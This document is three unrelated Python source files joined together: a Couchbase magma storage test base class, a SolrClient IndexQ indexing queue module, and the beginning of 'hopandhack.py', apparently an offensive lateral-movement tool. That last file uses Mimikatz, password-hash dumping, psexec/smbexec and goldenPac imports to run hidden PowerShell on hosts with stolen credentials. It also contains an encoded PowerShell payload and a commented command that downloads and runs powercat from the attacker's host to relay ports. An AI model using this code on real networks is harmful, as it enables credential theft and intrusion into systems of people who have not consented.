disk_usage = self.get_disk_usage(
bucket, self.cluster.nodes_in_cluster)
self.disk_usage[bucket.name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial creation is {}MB\
".format(bucket.name,
self.disk_usage[bucket.name]))
self.log.info("==========Finished magma base setup========")
def tearDown(self):
super(MagmaBaseTest, self).tearDown()
def compute_docs_ranges(self, start=None, doc_ops=None):
self.multiplier = self.input.param("multiplier", 1)
doc_ops = doc_ops or self.doc_ops
ops_len = len(doc_ops.split(":"))
if "read" in doc_ops:
self.read_start = 0
self.read_end = self.init_items_per_collection
if ops_len > 1:
ops_len -= 1
if "create" in doc_ops:
ops_len -= 1
self.create_start = start or self.init_items_per_collection
if start:
self.create_end = start + start * self.multiplier
else:
self.create_end = self.init_items_per_collection + self.init_num_items * self.multiplier
self.num_items_per_collection += (self.create_end - self.create_start)
if ops_len == 1:
self.update_start = 0
self.update_end = self.init_num_items
self.expiry_start = 0
self.expiry_end = self.init_num_items * self.multiplier
self.delete_start = 0
self.delete_end = self.init_num_items
elif ops_len == 2:
self.update_start = 0
self.update_end = self.init_num_items // 2
self.delete_start = self.init_num_items // 2
self.delete_end = self.init_num_items
if "expiry" in doc_ops:
self.delete_start = 0
self.delete_end = self.init_num_items // 2
self.expiry_start = self.init_num_items // 2
self.expiry_end = self.init_num_items * self.multiplier
elif ops_len == 3:
self.update_start = 0
self.update_end = self.init_num_items // 3
self.delete_start = self.init_num_items // 3
self.delete_end = (2 * self.init_num_items) // 3
self.expiry_start = (2 * self.init_num_items) // 3
self.expiry_end = self.init_num_items * self.multiplier
self.read_start = self.update_start
self.read_end = self.update_end
if "delete" in doc_ops:
self.num_items_per_collection -= (self.delete_end - self.delete_start)
if "expiry" in doc_ops:
self.num_items_per_collection -= (self.expiry_end - self.expiry_start)
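        # Worked example for compute_docs_ranges() above (illustrative,
        # assumed numbers): with doc_ops="create:update:delete", multiplier=1
        # and init_items_per_collection == init_num_items == 6000, the ranges
        # become create 6000..12000, update 0..3000 and delete 3000..6000;
        # num_items_per_collection grows by 6000 for the creates and shrinks
        # by 3000 for the deletes.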
def validate_seq_itr(self):
if self.dcp_services and self.num_collections == 1:
index_build_q = "SELECT state FROM system:indexes WHERE name='{}';"
start = time.time()
result = False
while start + 300 > time.time():
result = self.query_client.query_tool(
index_build_q.format(self.initial_idx), timeout=60)
if result["results"][0]["state"] == "online":
result = True
break
self.sleep(5)
self.assertTrue(result, "initial_idx Index warmup failed")
self.final_idx = "final_idx"
self.final_idx_q = "CREATE INDEX %s on default:`%s`.`%s`.`%s`(body) with \
{\"defer_build\": false};" % (self.final_idx,
self.buckets[0].name,
CbServer.default_scope,
self.collections[0])
result = self.query_client.query_tool(self.final_idx_q, timeout=3600)
start = time.time()
if result["status"] != "success":
while start + 300 > time.time():
result = self.query_client.query_tool(
index_build_q.format(self.final_idx), timeout=60)
if result["results"][0]["state"] == "online":
result = True
break
self.sleep(5)
self.assertTrue(result, "final_idx Index warmup failed")
else:
self.assertTrue(result["status"] == "success", "Index query failed!")
self.sleep(5)
self.initial_count_q = "Select count(*) as items "\
"from default:`{}`.`{}`.`{}` where meta().id like '%%';".format(
self.buckets[0].name, CbServer.default_scope, self.collections[0])
self.final_count_q = "Select count(*) as items "\
"from default:`{}`.`{}`.`{}` where body like '%%';".format(
self.buckets[0].name, CbServer.default_scope, self.collections[0])
self.log.info(self.initial_count_q)
self.log.info(self.final_count_q)
initial_count, final_count = 0, 0
kv_items = self.bucket_util.get_bucket_current_item_count(
self.cluster, self.buckets[0])
start = time.time()
while start + 300 > time.time():
kv_items = self.bucket_util.get_bucket_current_item_count(
self.cluster, self.buckets[0])
self.log.info("Items in KV: %s" % kv_items)
initial_count = self.query_client.query_tool(
self.initial_count_q)["results"][0]["items"]
self.log.info("## Initial Index item count in %s:%s:%s == %s"
% (self.buckets[0].name,
CbServer.default_scope, self.collections[0],
initial_count))
final_count = self.query_client.query_tool(self.final_count_q)["results"][0]["items"]
self.log.info("## Final Index item count in %s:%s:%s == %s"
% (self.buckets[0].name,
CbServer.default_scope, self.collections[0],
final_count))
if initial_count != kv_items or final_count != kv_items:
self.sleep(5)
continue
break
# self.assertTrue(initial_count == kv_items,
# "Indexer failed. KV:{}, Initial:{}".
# format(kv_items, initial_count))
# self.assertTrue(final_count == kv_items,
# "Indexer failed. KV:{}, Final:{}".
# format(kv_items, final_count))
def get_magma_stats(self, bucket, servers=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
servers = servers or self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
result = dict()
shell = RemoteMachineShellConnection(server)
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
shell.disconnect()
magma_stats_for_all_servers[server.ip] = result
return magma_stats_for_all_servers
def get_disk_usage(self, bucket, servers=None):
return self.magma_utils.get_disk_usage(self.cluster, bucket,
self.data_path, servers)
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
time_end = time.time() + 60 * 5
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
while time.time() < time_end:
stats = list()
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
if not self.windows_platform:
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
else:
output = shell.execute_command(
"cat /proc/cpuinfo | grep 'processor' | tail -1 | awk '{print $3}'"
)[0][0].split('\n')[0]
output = str(int(output) + 1)
self.log.debug("%s - core(s): %s" % (server.ip, output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(
bucket, [server],
field_to_grep=grep_field)
fragmentation_values.append(
float(_res[server.ip][grep_field][
"Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
res = list()
for value in result.values():
res.append(max(value))
if (max(res)) <= 1.1 * (float(self.fragmentation)/100):
self.log.info("magma stats fragmentation result %s" % result)
self.log.debug(stats)
return True
self.log.info("magma stats fragmentation result %s" % result)
self.log.info("Fragmentation value that exceeds the configured value is ==> {}".format(max(res)))
self.log.info(stats)
return False
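        # Worked example for the check above (illustrative): with
        # self.fragmentation == 50 the acceptance bound is 1.1 * (50/100) = 0.55,
        # so this method returns True only while the highest per-shard
        # "Fragmentation" value reported by magma stats stays at or below 0.55.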
def get_fragmentation_upsert_docs_list(self):
"""
This function gives the list of "number of docs" need
to be updated to touch the given fragmentation value
"""
update_doc_count = int(math.ceil(float(
self.fragmentation * self.num_items) / (
100 - self.fragmentation)))
upsert_doc_list = list()
while update_doc_count > self.num_items:
upsert_doc_list.append(self.num_items)
update_doc_count -= self.num_items
if update_doc_count > 0:
upsert_doc_list.append(update_doc_count)
self.log.info("Upsert list {}".format(upsert_doc_list))
return upsert_doc_list
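        # Worked example (illustrative numbers): with fragmentation=50 and
        # num_items=1000000 the formula gives ceil(50 * 1000000 / 50) = 1000000
        # docs, so upsert_doc_list == [1000000]; with fragmentation=80 it gives
        # 4000000 docs, split into [1000000, 1000000, 1000000, 1000000].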
def get_state_files(self, bucket, server=None):
if server is None:
server = self.cluster.master
shell = RemoteMachineShellConnection(server)
magma_path = os.path.join(self.data_path,
bucket.name, "magma.0")
kv_path = shell.execute_command("ls %s | grep kv | head -1" %
magma_path)[0][0].split('\n')[0]
path = os.path.join(magma_path, kv_path, "rev*/seqIndex")
self.log.debug("SeqIndex path = {}".format(path))
output = shell.execute_command("ls %s | grep state" % path)[0]
self.log.debug("State files = {}".format(output))
shell.disconnect()
return output
def get_random_keyIndex(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name keyIndex".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_random_seqIndex(self):
shell = RemoteMachineShellConnection(self.cluster.master)
seqIndex, _ = shell.execute_command("find {} -name seqIndex".format(self.data_path))
shell.disconnect()
return random.choice(seqIndex)
def get_random_wal(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name wal".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_random_kvstore(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name kvstore-*".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_tombstone_count_key(self, servers=[]):
total_tombstones = {'final_count' : 0}
ts_per_node = dict()
for server in servers:
ts_per_node[server.ip] = 0
threads = []
lock = threading.Lock()
def count_tombstones(node, lock):
result = 0
result_str = ""
bucket = self.cluster.buckets[0]
magma_path = os.path.join(self.data_path, bucket.name, "magma.{}")
shell = RemoteMachineShellConnection(node)
shards = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(node.ip, shards))
for shard in range(min(int(shards), 64)):
magma = magma_path.format(shard)
kvstores, _ = shell.execute_command("ls {} | grep kvstore".format(magma))
cmd = '/opt/couchbase/bin/magma_dump {}'.format(magma)
for kvstore in kvstores:
dump = cmd
kvstore_num = kvstore.split("-")[1].strip()
dump += ' --kvstore {} --tree key --treedata | grep Key |grep \'"deleted":true\' | wc -l'.format(kvstore_num)
ts_count = shell.execute_command(dump)[0][0].strip()
self.log.debug("kvstore_num=={}, ts_count=={}".format(kvstore_num, ts_count))
result_str += str(ts_count) + "+"
result += int(ts_count)
self.log.info("node={} and result={}".format(node, result))
lock.acquire()
increment_result(result)
lock.release()
ts_per_node[node.ip] = result
def increment_result(result):
total_tombstones['final_count'] += result
for server in servers:
th = threading.Thread(
target=count_tombstones, args=[server, lock])
th.start()
threads.append(th)
for th in threads:
th.join()
self.log.info("total_tombstones {}".format(total_tombstones['final_count']))
self.log.info(" TombStones per node {}".format(ts_per_node))
return total_tombstones['final_count']
def get_tombstone_count_seq(self, server=None, shard=0, kvstore=0):
cmd = '/opt/couchbase/bin/magma_dump /data/kv/default/magma.{}/ \
--kvstore {} --tree key --treedata | grep Seq| wc -l'.format(shard,
kvstore)
shell = RemoteMachineShellConnection(server)
result = shell.execute_command(cmd)[0]
return result
def get_level_data_range(self, server=None, tree="key", shard=0, kvstore=0):
cmd = '/opt/couchbase/bin/magma_dump /data/kv/default/magma.{}/ \
--kvstore {} --tree {}'.format(shard, kvstore, tree)
shell = RemoteMachineShellConnection(server)
result = shell.execute_command(cmd)[0]
return result
|
indexq.py
|
import datetime
import logging
import sys
import os
import gzip
import shutil
import random
import json
import threading
import time
from multiprocessing.pool import ThreadPool
from multiprocessing import Process, JoinableQueue
from functools import partial
from SolrClient.exceptions import *
class IndexQ():
'''
    The IndexQ submodule helps with indexing content into Solr. It can be used to de-couple data processing from indexing.
Each queue is set up with the following directory structure
queue_name/
- todo/
- done/
Items get saved to the todo directory and once an item is processed it gets moved to the done directory. Items are processed in chronological order.
'''
def __init__(self, basepath, queue, compress=False, compress_complete=False, size=0, devel=False,
threshold=0.90, log=None, rotate_complete=None, **kwargs ):
'''
:param string basepath: Path to the root of the indexQ. All other queues will get created underneath this.
:param string queue: Name of the queue.
:param log: Logging instance that you want it to log to.
:param rotate_complete: Supply a callable that will be used to store completed files. Completed files will be moved to /done/`callable_output`/.
        :param bool compress: If True, compress todo files; useful when a lot of data will be queued and left sitting for a while.
        :param bool compress_complete: If True, compress completed files once they are moved to the done directory.
        :param int size: Internal buffer size (MB) that queued data must reach before it is written to the file system. If not passed, data is written out as soon as it is sent to IndexQ; otherwise it is written when the buffer reaches 90% of this size.
Example Usage::
i = IndexQ('/data/indexq','parsed_data')
'''
self.logger = log or logging.getLogger(__package__)
self._basepath = basepath
self._queue_name = queue
self._compress = compress
self._compress_complete = compress_complete
self._size = size
self._devel = devel
self._threshold = threshold
self._qpathdir = os.path.join(self._basepath, self._queue_name)
self._todo_dir = os.path.join(self._basepath, self._queue_name, 'todo')
self._done_dir = os.path.join(self._basepath, self._queue_name, 'done')
self._locked = False
self._rlock = threading.RLock()
self.rotate_complete = rotate_complete
#Lock File
self._lck = os.path.join(self._qpathdir,'index.lock')
for dir in [self._qpathdir, self._todo_dir, self._done_dir]:
if not os.path.isdir(dir):
os.makedirs(dir)
        #The single placeholder in the pattern is filled with a datestamp plus a random suffix
self._output_filename_pattern = self._queue_name+"_{}.json"
self._preprocess = self._buffer(self._size*1000000, self._write_file)
self.logger.info("Opening Queue {}".format(queue))
def _gen_file_name(self):
'''
        Generates a random file name, based on self._output_filename_pattern, for the output todo file.
'''
date = datetime.datetime.now()
dt = "{}-{}-{}-{}-{}-{}-{}".format(str(date.year),str(date.month),str(date.day),str(date.hour),str(date.minute),str(date.second),str(random.randint(0,10000)))
return self._output_filename_pattern.format(dt)
def add(self, item=None, finalize=False, callback=None):
'''
        Takes a string, dictionary or list of items to add to the queue. To help with troubleshooting it returns the updated buffer size; once the content actually gets written it returns the file path of the new file instead. Generally this can be safely discarded.
        :param <dict,list> item: Item to add to the queue. If a dict, it will be wrapped in a list and then serialized to JSON. A list must be a list of dictionaries. If a string is submitted, it will be written out as-is immediately and not buffered.
        :param bool finalize: If items are buffered internally, flush them to disk and return the file name.
        :param callback: A callback function that will be called when the item gets written to disk. It will be passed one positional argument, the file path of the file written. Note that errors from the callback method will not be re-raised here.
'''
if item:
if type(item) is list:
check = list(set([type(d) for d in item]))
if len(check) > 1 or dict not in check:
raise ValueError("More than one data type detected in item (list). Make sure they are all dicts of data going to Solr")
elif type(item) is dict:
item = [item]
elif type(item) is str:
return self._write_file(item)
else:
raise ValueError("Not the right data submitted. Make sure you are sending a dict or list of dicts")
with self._rlock:
res = self._preprocess(item, finalize, callback)
return res
def _write_file(self, content):
while True:
path = os.path.join(self._todo_dir,self._gen_file_name())
if self._compress:
path += '.gz'
if not os.path.isfile(path):
break
self.logger.info("Writing new file to {}".format(path))
if self._compress:
with gzip.open(path, 'wb') as f:
f.write(content.encode('utf-8'))
else:
with open(path,'w') as f:
f.write(content)
return path
def _buffer(self, size, callback):
_c = {
'size': 0,
'callback': callback,
'osize': size if size > 0 else 1,
'buf': []
}
self.logger.debug("Starting Buffering Queue with Size of {}".format(size))
def inner(item=None, finalize=False, listener=None):
            #Listener is the external callback specified by the user. Need to change the names a bit later.
if item:
#Buffer Item
[_c['buf'].append(x) for x in item]
                #Wish I didn't have to make a string of it here; sys.getsizeof wasn't providing accurate info either.
_c['size'] += len(str(item))
if self._devel:
self.logger.debug("Item added to Buffer {} New Buffer Size is {}".format(self._queue_name, _c['size']))
if _c['size'] / _c['osize'] > self._threshold or (finalize is True and len(_c['buf']) >= 1):
#Write out the buffer
if self._devel:
if finalize:
self.logger.debug("Finalize is True, writing out")
else:
self.logger.debug("Buffer Filled, writing out")
res = _c['callback'](json.dumps(_c['buf'], indent=0, sort_keys=True))
if listener:
try:
listener(res)
except Exception as e:
self.logger.error("Problems in the Callback specified")
self.logger.exception(e)
if res:
_c['buf'] = []
_c['size'] = 0
return res
else:
raise RuntimeError("Couldn't write out the buffer." + _c)
return _c['size']
return inner
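        # Worked example for _buffer() above (illustrative): with size=1 the
        # buffer holds up to 1,000,000 characters and the default threshold of
        # 0.90 means an add() call that pushes the accumulated len(str(item))
        # total past 900,000 characters triggers the _write_file callback; with
        # size=0 the capacity defaults to 1, so any buffered item exceeds the
        # threshold and is written out by the same add() call.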
    #This is about pulling data out
def _lock(self):
'''
Locks, or returns False if already locked
'''
if not self._is_locked():
with open(self._lck,'w') as fh:
if self._devel: self.logger.debug("Locking")
fh.write(str(os.getpid()))
return True
else:
return False
def _is_locked(self):
'''
Checks to see if we are already pulling items from the queue
'''
if os.path.isfile(self._lck):
try:
import psutil
except ImportError:
return True #Lock file exists and no psutil
#If psutil is imported
with open(self._lck) as f:
pid = f.read()
return True if psutil.pid_exists(int(pid)) else False
else:
return False
def _unlock(self):
'''
Unlocks the index
'''
if self._devel: self.logger.debug("Unlocking Index")
if self._is_locked():
os.remove(self._lck)
return True
else:
return True
def get_all_as_list(self, dir='_todo_dir'):
'''
        Returns a list of the full paths to all items currently in the todo directory. The items will be listed in ascending order based on filesystem time.
        This will re-scan the directory on each execution.
        Do not use this to process items; this method should only be used for troubleshooting or other ancillary tasks. To process items, use the get_todo_items() iterator.
'''
dir = getattr(self,dir)
list = [x for x in os.listdir(dir) if x.endswith('.json') or x.endswith('.json.gz')]
full = [os.path.join(dir,x) for x in list]
full.sort(key=lambda x: os.path.getmtime(x))
return full
def get_todo_items(self, **kwargs):
'''
        Returns an iterator that will provide each item in the todo queue. Note that to complete each item you have to call the complete() method with the output of this iterator.
That will move the item to the done directory and prevent it from being retrieved in the future.
'''
def inner(self):
for item in self.get_all_as_list():
yield item
self._unlock()
if not self._is_locked():
if self._lock():
return inner(self)
raise RuntimeError("RuntimeError: Index Already Locked")
def complete(self, filepath):
'''
Marks the item as complete by moving it to the done directory and optionally gzipping it.
'''
if not os.path.exists(filepath):
raise FileNotFoundError("Can't Complete {}, it doesn't exist".format(filepath))
if self._devel: self.logger.debug("Completing - {} ".format(filepath))
if self.rotate_complete:
try:
complete_dir = str(self.rotate_complete())
except Exception as e:
self.logger.error("rotate_complete function failed with the following exception.")
self.logger.exception(e)
raise
newdir = os.path.join(self._done_dir, complete_dir)
newpath = os.path.join(newdir, os.path.split(filepath)[-1] )
if not os.path.isdir(newdir):
self.logger.debug("Making new directory: {}".format(newdir))
os.makedirs(newdir)
else:
newpath = os.path.join(self._done_dir, os.path.split(filepath)[-1] )
try:
if self._compress_complete:
if not filepath.endswith('.gz'):
# Compressing complete, but existing file not compressed
# Compress and move it and kick out
newpath += '.gz'
self._compress_and_move(filepath, newpath)
return newpath
# else the file is already compressed and can just be moved
#if not compressing completed file, just move it
shutil.move(filepath, newpath)
self.logger.info(" Completed - {}".format(filepath))
except Exception as e:
self.logger.error("Couldn't Complete {}".format(filepath))
self.logger.exception(e)
raise
return newpath
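        # Worked example for the rotate_complete handling above (illustrative):
        # constructing IndexQ(..., rotate_complete=datetime.date.today) makes
        # completed files land in done/<YYYY-MM-DD>/ instead of directly in
        # done/, since str(rotate_complete()) is used as the sub-directory name.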
def _compress_and_move(self, source, destination):
try:
self.logger.debug("Compressing and Moving Completed file: {} -> {}".format(source, destination))
with gzip.open(destination, 'wb') as df, open(source, 'rb') as sf:
df.writelines(sf)
os.remove(source)
except Exception as e:
self.logger.error("Unable to Compress and Move file {} -> {}".format(source, destination))
self.logger.exception(e)
raise
return True
def index(self, solr, collection, threads=1, send_method='stream_file', **kwargs):
'''
        Will index the queue into a specified Solr instance and collection. Specify multiple threads to make this faster; however, keep in mind that with multiple threads the items may not be indexed in order.
Example::
solr = SolrClient('http://localhost:8983/solr/')
for doc in self.docs:
index.add(doc, finalize=True)
index.index(solr,'SolrClient_unittest')
:param object solr: SolrClient object.
:param string collection: The name of the collection to index document into.
:param int threads: Number of simultaneous threads to spin up for indexing.
:param string send_method: SolrClient method to execute for indexing. Default is stream_file
'''
try:
method = getattr(solr, send_method)
except AttributeError:
raise AttributeError("Couldn't find the send_method. Specify either stream_file or local_index")
self.logger.info("Indexing {} into {} using {}".format(self._queue_name,
collection,
send_method))
if threads > 1:
if hasattr(collection, '__call__'):
self.logger.debug("Overwriting send_method to index_json")
method = getattr(solr, 'index_json')
method = partial(self._wrap_dynamic, method, collection)
else:
method = partial(self._wrap, method, collection)
with ThreadPool(threads) as p:
p.map(method, self.get_todo_items())
else:
for todo_file in self.get_todo_items():
try:
result = method(collection, todo_file)
if result:
self.complete(todo_file)
except SolrError:
self.logger.error("Error Indexing Item: {}".format(todo_file))
self._unlock()
raise
def _wrap(self, method, collection, doc):
#Indexes entire file into the collection
try:
res = method(collection, doc)
if res:
self.complete(doc)
return res
except SolrError:
self.logger.error("Error Indexing Item: {}".format(doc))
pass
def _wrap_dynamic(self, method, collection, doc):
# Reads the file, executing 'collection' function on each item to
# get the name of collection it should be indexed into
try:
j_data = self._open_file(doc)
temp = {}
for item in j_data:
try:
coll = collection(item)
if coll in temp:
temp[coll].append(item)
else:
temp[coll] = [item]
except Exception as e:
self.logger.error("Exception caught on dynamic collection function")
self.logger.error(item)
self.logger.exception(e)
raise
indexing_errors = 0
done = []
for coll in temp:
try:
res = method(coll, json.dumps(temp[coll]))
if res:
done.append(coll)
except Exception as e:
self.logger.error("Indexing {} items into {} failed".format(len(temp[coll]), coll))
indexing_errors += 1
if len(done) == len(temp.keys()) and indexing_errors == 0:
self.complete(doc)
return True
return False
except SolrError as e:
self.logger.error("Error Indexing Item: {}".format(doc))
self.logger.exception(e)
pass
def get_all_json_from_indexq(self):
'''
Gets all data from the todo files in indexq and returns one huge list of all data.
'''
files = self.get_all_as_list()
out = []
for efile in files:
out.extend(self._open_file(efile))
return out
def _open_file(self, efile):
if efile.endswith('.gz'):
f = gzip.open(efile, 'rt', encoding='utf-8')
else:
f = open(efile)
f_data = json.load(f)
f.close()
return f_data
def get_multi_q(self, sentinel='STOP'):
'''
        This helps IndexQ operate in a multiprocessing environment without each process having to have its own IndexQ. It is also a handy way to deal with thread / process safety.
        This method will create and return a JoinableQueue object. Additionally, it will kick off a back-end process that will monitor the queue, de-queue items and add them to this IndexQ.
The returned JoinableQueue object can be safely passed to multiple worker processes to populate it with data.
To indicate that you are done writing the data to the queue, pass in the sentinel value ('STOP' by default).
Make sure you call join_indexer() after you are done to close out the queue and join the worker.
'''
self.in_q = JoinableQueue()
self.indexer_process = Process(target=self._indexer_process, args=(self.in_q, sentinel))
self.indexer_process.daemon = False
self.indexer_process.start()
return self.in_q
def join_indexer(self):
self.logger.info("Joining Queue")
self.in_q.join()
self.logger.info("Joining Index Process")
self.indexer_process.join()
def _indexer_process(self, in_q, sentinel):
self.logger.info("Indexing Process Started")
count = 0
total = 0
stime = time.time()
seen_STOP = False
while True:
if seen_STOP and in_q.qsize() == 0:
#If sentinel has been seen and the queue size is zero, write out the queue and return.
self.logger.info("Indexer Queue is empty. Stopping....")
self.add(finalize=True)
return
if in_q.qsize() < 1 and not seen_STOP:
#If there is nothing to do, just hang out for a few seconds
time.sleep(3)
continue
item = in_q.get()
if item == sentinel:
self.logger.info("Indexer Received Stop Command, stopping indexer. Queue size is {}".format(str(in_q.qsize())))
seen_STOP = True
in_q.task_done()
continue
count += 1
total += 1
self.add(item)
in_q.task_done()
if (time.time() - stime) > 60:
self.logger.debug("Indexed {} items in the last 60 seconds. Total: ".format(count, total))
count = 0
stime = time.time()
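# --- Hedged usage sketch (not part of the original module) ---
# Shows the get_multi_q()/join_indexer() workflow described in the docstrings
# above. The basepath, queue name, worker count and document shape are
# illustrative assumptions only, and the nested producer target assumes a
# fork-based multiprocessing start method.
def _example_multi_q_usage():
    iq = IndexQ('/data/indexq', 'parsed_data', size=1)
    in_q = iq.get_multi_q()              # starts the background indexer process
    def producer(q, start):
        for i in range(start, start + 1000):
            q.put({'id': str(i)})        # any JSON-serialisable dict
    workers = [Process(target=producer, args=(in_q, n * 1000)) for n in range(2)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    in_q.put('STOP')                     # sentinel: all producers are done
    iq.join_indexer()                    # drain the queue and join the indexer
    return iq.get_all_as_list()          # todo files written by the indexer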
|
hopandhack.py
|
#!/usr/bin/env python
from deps.psexec import *
from deps.wmiexec import *
from deps.smbexec import *
from deps.secretsdump import *
from deps.smb_exploit1 import *
from deps.goldenPac import *
from signal import alarm, signal, SIGALRM, SIGKILL
from subprocess import Popen, PIPE
import threading
import smbexec2
from SocketServer import ThreadingMixIn, ForkingMixIn
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from netaddr import IPNetwork,IPAddress
import random
import sys
#import socket
import resource
from threading import Timer
import thread, time, sys
import time
import timeout_decorator
import gevent
import csv
import os,binascii
from shutil import copyfile
import glob
import Queue
import nmap
verbose=False
def timeout():
thread.interrupt_main()
bold=True
from termcolor import colored, cprint
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class ForkingSimpleServer(ForkingMixIn, HTTPServer):
pass
#domain='workgroup'
#username='administrator'
#password='p@ssw0rd'
#relayPortNo=60000
relayPortNo=random.randint(60000,65000)
hashes=None
aesKey=None
k=False
dc_ip=None
mode='SHARE'
share='C$'
powershellArgs=' -NoP -NonI -W Hidden -ep bypass '
tmpFilename1=binascii.b2a_hex(os.urandom(20))+".ps1" #Get-PassHashes.ps1
tmpFilename2=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Mimikatz.ps1
tmpFilename3=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Ping.ps1
tmpFilename4=binascii.b2a_hex(os.urandom(20))+".ps1" #Invoke-Portscan.ps1
tmpFilename5=binascii.b2a_hex(os.urandom(20))+".ps1" #powercat.ps1
tmpFilename6=binascii.b2a_hex(os.urandom(20))+".ps1" #Start-WebServer.ps1
web_dir = os.getcwd()+"/modules"
orig_dir = os.getcwd()
for f in glob.glob(web_dir+"/*.ps1"):
tmpFilename=f.replace(web_dir+"/","")
tmpFilename=tmpFilename.replace(".ps1","")
if len(tmpFilename)>19:
os.remove(f)
copyfile(web_dir+"/Get-PassHashes.ps1", web_dir+"/"+tmpFilename1)
copyfile(web_dir+"/Invoke-Mimikatz.ps1", web_dir+"/"+tmpFilename2)
copyfile(web_dir+"/Invoke-Ping.ps1", web_dir+"/"+tmpFilename3)
copyfile(web_dir+"/Invoke-Portscan.ps1", web_dir+"/"+tmpFilename4)
copyfile(web_dir+"/powercat.ps1", web_dir+"/"+tmpFilename5)
copyfile(web_dir+"/start-WebServer.ps1", web_dir+"/"+tmpFilename6)
userPassList=[]
compromisedHostList=[]
class ThreadingExample(object):
targetIP=''
targetPort=0
#def __init__(self, interval=1):
def __init__(self, ip, portNo):
interval=10
self.interval = interval
self.ip = ip
self.portNo = portNo
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
# Do something
#print('Doing something imporant in the background')
#if not isOpen(self.ip, self.portNo):
# print "Down: "+self.ip+":"+str(self.portNo)
#else:
# print "Up: "+self.ip+":"+str(self.portNo)
time.sleep(self.interval)
class relayThread(object):
def __init__(self, ip, targetIP, portNo, hopPoint1List, hopPoint2List):
self.hopPoint1List=hopPoint1List
self.hopPoint2List=hopPoint2List
threads=[]
self.ip = ip
self.targetIP = targetIP
self.portNo = portNo
#t = threading.Thread(target=self.runWebServer, args=())
threads = list()
t = threading.Thread(target=self.run, args=())
threads.append(t)
t1 = threading.Thread(target=self.runWebServer, args=())
threads.append(t1)
t.start()
t1.start()
#print t1.isAlive()
#thread.start_new_thread(self.run, ())
#thread.start_new_thread(self.runWebServer, ())
def runWebServer(self):
print (setColor("[+]", bold, color="blue"))+" Starting Web Server on host "+self.targetIP+":8000"
complete=False
while complete==False:
domain=self.hopPoint1List[0][0]
username=self.hopPoint1List[0][1]
password=self.hopPoint1List[0][2]
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -nop -enc JABIAHMAbwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAEgAdAB0AHAATABpAHMAdABlAG4AZQByADsAJABIAHMAbwAuAFAAcgBlAGYAaQB4AGUAcwAuAEEAZABkACgAIgBoAHQAdABwADoALwAvACsAOgA4ADAAMAAwAC8AIgApADsAJABIAHMAbwAuAFMAdABhAHIAdAAoACkAOwBXAGgAaQBsAGUAIAAoACQASABzAG8ALgBJAHMATABpAHMAdABlAG4AaQBuAGcAKQB7ACQASABDAD0AJABIAHMAbwAuAEcAZQB0AEMAbwBuAHQAZQB4AHQAKAApADsAJABIAFIAZQBzAD0AJABIAEMALgBSAGUAcwBwAG8AbgBzAGUAOwAkAEgAUgBlAHMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIALAAiAHQAZQB4AHQALwBwAGwAYQBpAG4AIgApADsAJABCAHUAZgA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAKABHAEMAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAJABQAHcAZAAgACgAJABIAEMALgBSAGUAcQB1AGUAcwB0ACkALgBSAGEAdwBVAHIAbAApACkAKQA7ACQASABSAGUAcwAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgANgA0AD0AJABCAHUAZgAuAEwAZQBuAGcAdABoADsAJABIAFIAZQBzAC4ATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAEIAdQBmACwAMAAsACQAQgB1AGYALgBMAGUAbgBnAHQAaAApADsAJABIAFIAZQBzAC4AQwBsAG8AcwBlACgAKQB9ADsAJABIAHMAbwAuAFMAdABvAHAAKAApAA=="
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -nop -file C:\\windows\\temp\\"+tmpFilename6+" \"http://+:8000/\""
if verbose==True:
print command
portNo=445
executer = smbexec2.CMDEXEC(username, password, domain, hashes, aesKey, k, dc_ip, mode, share, portNo, command)
executer.run(self.ip, self.ip)
results=executer.getOutput()
complete=True
def run(self):
complete=False
while complete==False:
print (setColor("[+]", bold, color="blue"))+" Starting Relay on host: "+self.targetIP+":"+str(self.portNo)
#command="cmd /c powershell.exe -Command \"IEX (New-Object System.Net.Webclient).DownloadString('http://"+myIP+":8888/powercat.ps1'); powercat -l -p "+str(self.portNo)+" -rep -r tcp:"+self.targetIP+":445\""
